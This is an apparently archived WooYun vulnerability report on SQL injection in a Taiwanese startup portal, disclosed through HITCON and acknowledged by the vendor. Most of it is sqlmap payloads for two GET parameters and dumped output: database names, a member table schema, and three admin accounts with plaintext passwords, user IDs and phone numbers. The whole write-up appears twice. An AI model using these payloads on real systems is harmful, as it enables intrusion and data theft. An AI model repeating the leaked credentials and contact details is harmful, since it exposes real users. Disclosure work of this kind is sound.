当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171691

漏洞标题:Yes頂尖!創業網www站点SQL注入(影响大量管理员/会员用户/订单等等)(臺灣地區)

相关厂商:Yes頂尖!創業網

漏洞作者: 路人甲

提交时间:2016-01-21 17:48

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-21: 细节已通知厂商并且等待厂商处理中
2016-01-21: 厂商已经确认,细节仅向厂商公开
2016-01-31: 细节向核心白帽子及相关领域专家公开
2016-02-10: 细节向普通白帽子公开
2016-02-20: 细节向实习白帽子公开
2016-03-05: 细节向公众公开

简要描述:

123

详细说明:

注入:

http://**.**.**.**/ally/list_in.php?ID=181&res_number=U2013061822564


两个参数都存在注入:

Place: GET
Parameter: ID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=181 AND 7278=7278&res_number=U2013061822564
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: ID=181 AND (SELECT 8737 FROM(SELECT COUNT(*),CONCAT(0x3a626b713
ELECT (CASE WHEN (8737=8737) THEN 1 ELSE 0 END)),0x3a6378713a,FLOOR(RAND(0)*
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&res_number=U2013061822
Place: GET
Parameter: res_number
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: ID=181&res_number=U2013061822564' AND (SELECT 7111 FROM(SELECT
T(*),CONCAT(0x3a626b713a,(SELECT (CASE WHEN (7111=7111) THEN 1 ELSE 0 END)),
6378713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY
 AND 'eyTV'='eyTV
---
there were multiple injection points, please select the one to use for follo
 injections:
[0] place: GET, parameter: ID, type: Unescaped numeric (default)
[1] place: GET, parameter: res_number, type: Single quoted string
[q] Quit
>
[15:55:51] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[15:55:51] [INFO] fetching current user
[15:55:52] [INFO] retrieved: yesoneco_yesone@localhost
current user:    'yesoneco_yesone@localhost'


available databases [16]:
[*] information_schema
[*] yesoneco_adminuser
[*] yesoneco_ally
[*] yesoneco_design
[*] yesoneco_member
[*] yesoneco_new2015
[*] yesoneco_news
[*] yesoneco_qa
[*] yesoneco_slds
[*] yesoneco_tool
[*] yesoneco_web
[*] yesoneco_webdb
[*] yesoneco_webdb2
[*] yesoneco_webdb_test
[*] yesoneco_webpage
[*] yesoneco_yestop


Table: member
[15 columns]
+-----------------+------------------+
| Column          | Type             |
+-----------------+------------------+
| date            | datetime         |
| ID              | int(11) unsigned |
| number          | text             |
| tel_header      | varchar(100)     |
| user_cell_phone | varchar(100)     |
| user_cell_tel   | varchar(100)     |
| user_email      | varchar(100)     |
| user_how_know   | varchar(100)     |
| user_lastName   | varchar(100)     |
| user_male       | varchar(100)     |
| user_man        | varchar(100)     |
| user_passwd     | varchar(100)     |
| user_rank       | varchar(100)     |
| user_userid     | varchar(100)     |
| web             | varchar(100)     |
+-----------------+------------------+
3个管理员明文密码
<code>[3 entries]
+---------------------+-----+----------------+------------+-----------------+---
------------+-----------------------+---------------+---------------+-----------
+----------+-------------+-----------+-------------+------+
| date                | ID  | number         | tel_header | user_cell_phone | us
er_cell_tel | user_email            | user_how_know | user_lastName | user_male
| user_man | user_passwd | user_rank | user_userid | web  |
+---------------------+-----+----------------+------------+-----------------+---
------------+-----------------------+---------------+---------------+-----------
+----------+-------------+-----------+-------------+------+
| NULL                | 130 | U2013052877021 | NULL       | NULL            | NU
LL          | NULL                  | NULL          | ???           | M
| 2        | q123456     | 1         | yesone91    | NULL |
| 2013-07-22 16:26:32 | 132 | U2013061822564 | 02         | 0229925205      | 29
925205      | DoMo4690@**.**.**.**    | ??????        | ??            | F
| 0        | 821228      | NULL      | yesone123   | 2    |
| 2013-08-01 18:36:00 | 134 | U2013080155471 | 02         | 0918965658      | 29
21578       | **.**.**.**@**.**.**.** | ??????        | ???           | M
| 2        | 00882299    | NULL      | wei70       | NULL |
+---------------------+-----+----------------+------------+-----------------+---
------------+-----------------------+---------------+---------------+-----------
+----------+-------------+-----------+-------------+------+


接近2000用户

Database: yesoneco_member
+--------+---------+
| Table  | Entries |
+--------+---------+
| member | 1876    |
+--------+---------+


VHZF9}ST9~H~XFF023PBPG0.png


Database: yesoneco_webdb
+----------+---------+
| Table    | Entries |
+----------+---------+
| customer | 619     |
+----------+---------+


又测漏49admin

Database: yesoneco_webdb
+-------+---------+
| Table | Entries |
+-------+---------+
| admin | 49      |
+-------+---------+


订单

Database: yesoneco_webdb
+----------+---------+
| Table    | Entries |
+----------+---------+
| ORDER_TB | 4436    |
+----------+---------+


漏洞证明:

注入:

http://**.**.**.**/ally/list_in.php?ID=181&res_number=U2013061822564


两个参数都存在注入:

Place: GET
Parameter: ID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=181 AND 7278=7278&res_number=U2013061822564
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: ID=181 AND (SELECT 8737 FROM(SELECT COUNT(*),CONCAT(0x3a626b713
ELECT (CASE WHEN (8737=8737) THEN 1 ELSE 0 END)),0x3a6378713a,FLOOR(RAND(0)*
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&res_number=U2013061822
Place: GET
Parameter: res_number
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: ID=181&res_number=U2013061822564' AND (SELECT 7111 FROM(SELECT
T(*),CONCAT(0x3a626b713a,(SELECT (CASE WHEN (7111=7111) THEN 1 ELSE 0 END)),
6378713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY
 AND 'eyTV'='eyTV
---
there were multiple injection points, please select the one to use for follo
 injections:
[0] place: GET, parameter: ID, type: Unescaped numeric (default)
[1] place: GET, parameter: res_number, type: Single quoted string
[q] Quit
>
[15:55:51] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[15:55:51] [INFO] fetching current user
[15:55:52] [INFO] retrieved: yesoneco_yesone@localhost
current user:    'yesoneco_yesone@localhost'


available databases [16]:
[*] information_schema
[*] yesoneco_adminuser
[*] yesoneco_ally
[*] yesoneco_design
[*] yesoneco_member
[*] yesoneco_new2015
[*] yesoneco_news
[*] yesoneco_qa
[*] yesoneco_slds
[*] yesoneco_tool
[*] yesoneco_web
[*] yesoneco_webdb
[*] yesoneco_webdb2
[*] yesoneco_webdb_test
[*] yesoneco_webpage
[*] yesoneco_yestop


Table: member
[15 columns]
+-----------------+------------------+
| Column          | Type             |
+-----------------+------------------+
| date            | datetime         |
| ID              | int(11) unsigned |
| number          | text             |
| tel_header      | varchar(100)     |
| user_cell_phone | varchar(100)     |
| user_cell_tel   | varchar(100)     |
| user_email      | varchar(100)     |
| user_how_know   | varchar(100)     |
| user_lastName   | varchar(100)     |
| user_male       | varchar(100)     |
| user_man        | varchar(100)     |
| user_passwd     | varchar(100)     |
| user_rank       | varchar(100)     |
| user_userid     | varchar(100)     |
| web             | varchar(100)     |
+-----------------+------------------+
3个管理员明文密码
<code>[3 entries]
+---------------------+-----+----------------+------------+-----------------+---
------------+-----------------------+---------------+---------------+-----------
+----------+-------------+-----------+-------------+------+
| date                | ID  | number         | tel_header | user_cell_phone | us
er_cell_tel | user_email            | user_how_know | user_lastName | user_male
| user_man | user_passwd | user_rank | user_userid | web  |
+---------------------+-----+----------------+------------+-----------------+---
------------+-----------------------+---------------+---------------+-----------
+----------+-------------+-----------+-------------+------+
| NULL                | 130 | U2013052877021 | NULL       | NULL            | NU
LL          | NULL                  | NULL          | ???           | M
| 2        | q123456     | 1         | yesone91    | NULL |
| 2013-07-22 16:26:32 | 132 | U2013061822564 | 02         | 0229925205      | 29
925205      | DoMo4690@**.**.**.**    | ??????        | ??            | F
| 0        | 821228      | NULL      | yesone123   | 2    |
| 2013-08-01 18:36:00 | 134 | U2013080155471 | 02         | 0918965658      | 29
21578       | **.**.**.**@**.**.**.** | ??????        | ???           | M
| 2        | 00882299    | NULL      | wei70       | NULL |
+---------------------+-----+----------------+------------+-----------------+---
------------+-----------------------+---------------+---------------+-----------
+----------+-------------+-----------+-------------+------+


接近2000用户

Database: yesoneco_member
+--------+---------+
| Table  | Entries |
+--------+---------+
| member | 1876    |
+--------+---------+


VHZF9}ST9~H~XFF023PBPG0.png


Database: yesoneco_webdb
+----------+---------+
| Table    | Entries |
+----------+---------+
| customer | 619     |
+----------+---------+


又测漏49admin

Database: yesoneco_webdb
+-------+---------+
| Table | Entries |
+-------+---------+
| admin | 49      |
+-------+---------+


订单

Database: yesoneco_webdb
+----------+---------+
| Table    | Entries |
+----------+---------+
| ORDER_TB | 4436    |
+----------+---------+


修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-01-21 22:58

厂商回复:

感謝通報!

最新状态:

暂无